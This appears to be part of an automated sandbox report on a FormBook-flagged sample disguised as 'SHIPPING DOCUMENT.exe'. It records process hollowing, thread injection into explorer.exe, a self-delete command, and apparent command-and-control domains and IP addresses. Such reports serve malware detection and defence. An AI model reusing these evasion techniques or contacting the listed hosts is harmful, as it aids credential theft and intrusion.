          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03978DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0394A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03903D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03943540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03943884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03943884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03994015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03994015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_100014EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.barkinlot.com
          Source: C:\Windows\explorer.exeDomain query: www.buyruon.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.151.79.234 80
          Source: C:\Windows\explorer.exeDomain query: www.union-green.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.220.41.208 80
          Source: C:\Windows\explorer.exeDomain query: www.fuerzaagavera.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeSection loaded: unknown target: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: D60000
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: explorer.exe, 00000004.00000000.662030709.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.680444387.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Rootkit1Credential API Hooking1Security Software Discovery231Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection512Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 404217 Sample: SHIPPING DOCUMENT.exe Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 10 other signatures 2->44 10 SHIPPING DOCUMENT.exe 19 2->10         started        process3 file4 30 C:\Users\user\AppData\Local\...\2x6gdfzk.dll, PE32 10->30 dropped 56 Maps a DLL or memory area into another process 10->56 14 SHIPPING DOCUMENT.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 32 www.barkinlot.com 107.151.79.234, 49754, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK United States 17->32 34 www.union-green.com 154.220.41.208, 49766, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 17->34 36 4 other IPs or domains 17->36 46 System process connects to network (likely due to code injection or exploit) 17->46 48 Uses netstat to query active network connections and open ports 17->48 21 NETSTAT.EXE 17->21         started        24 autofmt.exe 17->24         started        signatures10 process11 signatures12 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 26 cmd.exe 1 21->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

